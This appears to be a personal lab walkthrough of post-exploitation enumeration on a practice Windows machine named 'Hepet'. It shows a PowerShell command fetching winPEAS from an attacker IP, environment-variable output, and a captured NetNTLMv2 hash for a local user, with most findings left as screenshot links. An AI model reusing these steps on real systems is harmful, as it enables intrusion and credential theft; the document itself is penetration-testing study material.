PEAS
Conducting an automated enumeration after performing a manual enumeration
PS C:\tmp> iwr -Uri http://192.168.45.153/winPEASx86.exe -OutFile C:\tmp\winPEASx86.exeDelivery complete
/Practice/Hepet/4-Post_Enumeration/attachments/{45972ACA-3480-4532-B6C0-057CB63FE783}.png)
Executing PEAS
ENV
���������� User Environment Variables
� Check for some passwords or keys in the env variables
Path: C:\Program Files\LibreOffice\program;C:\Program Files\LibreOffice\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Users\Ela Arwel\AppData\Local\Microsoft\WindowsApps
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
windir: C:\WINDOWS
USERDOMAIN: HEPET
PROCESSOR_ARCHITECTURE: x86
ProgramW6432: C:\Program Files
DriverData: C:\Windows\System32\Drivers\DriverData
PUBLIC: C:\Users\Public
APPDATA: C:\Users\Ela Arwel\AppData\Roaming
URE_BOOTSTRAP: file:///C:/Program%20Files/LibreOffice/program/fundamental.ini
LOCALAPPDATA: C:\Users\Ela Arwel\AppData\Local
CommonProgramW6432: C:\Program Files\Common Files
LANGUAGE: en_US.UTF-8
OneDrive: C:\Users\Ela Arwel\OneDrive
USERPROFILE: C:\Users\Ela Arwel
ProgramFiles: C:\Program Files (x86)
PROCESSOR_LEVEL: 25
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
HOMEPATH: \Users\Ela Arwel
COMPUTERNAME: HEPET
PROCESSOR_ARCHITEW6432: AMD64
USERNAME: Ela Arwel
NUMBER_OF_PROCESSORS: 2
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
SystemRoot: C:\WINDOWS
ComSpec: C:\WINDOWS\system32\cmd.exe
LOGONSERVER: \\HEPET
TEMP: C:\Users\ELAARW~1\AppData\Local\Temp
ProgramFiles(x86): C:\Program Files (x86)
LIBO_VERSION: 7.0.2.2
CommonProgramFiles: C:\Program Files (x86)\Common Files
TMP: C:\Users\ELAARW~1\AppData\Local\Temp
USERDOMAIN_ROAMINGPROFILE: HEPET
PROCESSOR_REVISION: 0101
PROMPT: $P$G
ALLUSERSPROFILE: C:\ProgramData
SystemDrive: C:
PSModulePath: C:\Users\Ela Arwel\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
OS: Windows_NT
PSExecutionPolicyPreference: Bypass
ProgramData: C:\ProgramData
HOMEDRIVE: C:
���������� System Environment Variables
� Check for some passwords or keys in the env variables
ComSpec: C:\WINDOWS\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files (x86)\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\WINDOWS\TEMP
TMP: C:\WINDOWS\TEMP
USERNAME: SYSTEM
windir: C:\WINDOWS
Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101LAPS
/Practice/Hepet/4-Post_Enumeration/attachments/{0D9DB363-7327-475C-AC3B-56E43C80EBD4}-1.png)
LSA Protection
/Practice/Hepet/4-Post_Enumeration/attachments/{B4923A76-A698-427B-A7FF-A3926FFF5C38}.png)
Credentials Guard
/Practice/Hepet/4-Post_Enumeration/attachments/{CDD39656-CF2F-453D-B43A-CC3332CD9F75}.png)
UAC
/Practice/Hepet/4-Post_Enumeration/attachments/{28DF0E22-6A7D-4461-9537-3A15C92F0A16}.png)
PowerShell
/Practice/Hepet/4-Post_Enumeration/attachments/{23782173-2B33-467E-B472-350C76F1062A}.png)
NTLM
/Practice/Hepet/4-Post_Enumeration/attachments/{139EC977-8217-4AD4-86C6-2AE304478200}.png)
/Practice/Hepet/4-Post_Enumeration/attachments/{8059237C-578E-4A31-A153-CDB997B438BE}.png)
Ela Arwel::HEPET:1122334455667788:9be8690291c593a032ec9347f1f6cbc2:01010000000000000680e5cd358ddb014fabc19a79fb5fd6000000000800300030000000000000000000000000200000fddba21abefbbfef27bcf4f1785a7040c72d7d3aec636c5ca8979886911e3b570a00100000000000000000000000000000000000090000000000000000000000
.NET Version
/Practice/Hepet/4-Post_Enumeration/attachments/{0784E289-2A24-46EB-9630-54EE1371BCEA}.png)
RDP Session
/Practice/Hepet/4-Post_Enumeration/attachments/{31F5BC20-AA3A-42F5-BCFA-941FE00120AD}.png)
Processes
/Practice/Hepet/4-Post_Enumeration/attachments/Pasted-image-20250304195207.png)
/Practice/Hepet/4-Post_Enumeration/attachments/{6E4333F8-F495-4DC9-B7D3-3ABC0A5DC8DB}.png)
/Practice/Hepet/4-Post_Enumeration/attachments/{3530B9D2-A373-4A2E-89C6-326021E34C4E}.png)
/Practice/Hepet/4-Post_Enumeration/attachments/{AC638093-F96D-4447-A01E-5DA9C80808E6}.png)
/Practice/Hepet/4-Post_Enumeration/attachments/{444DB50D-5C38-4075-A425-FA64E4C99D5B}.png)
/Practice/Hepet/4-Post_Enumeration/attachments/{AC05FC20-7134-443F-9BA7-F361C97FE759}.png)
/Practice/Hepet/4-Post_Enumeration/attachments/{06F7BAC7-F722-477A-8090-C2CE60AEE684}.png)
Services
/Practice/Hepet/4-Post_Enumeration/attachments/{1DF9348B-2748-4CF7-A947-1F206310B2E5}.png)
/Practice/Hepet/4-Post_Enumeration/attachments/{BC02B181-B780-4581-B22C-09D33CD482FF}.png)
Network
/Practice/Hepet/4-Post_Enumeration/attachments/{EC446A89-8311-4EF4-9BA1-23E986B8E9D5}.png)
11100 veyon-server
/Practice/Hepet/4-Post_Enumeration/attachments/{86486CA3-D0ED-4C67-9B63-06E1AAE3CC9E}.png)
Interesting Files/Directories
/Practice/Hepet/4-Post_Enumeration/attachments/{D1F5DC59-9698-459D-981B-785B422A8052}.png)
/Practice/Hepet/4-Post_Enumeration/attachments/{EE13A2FF-C593-40D3-8E4A-F0CE04F53843}.png)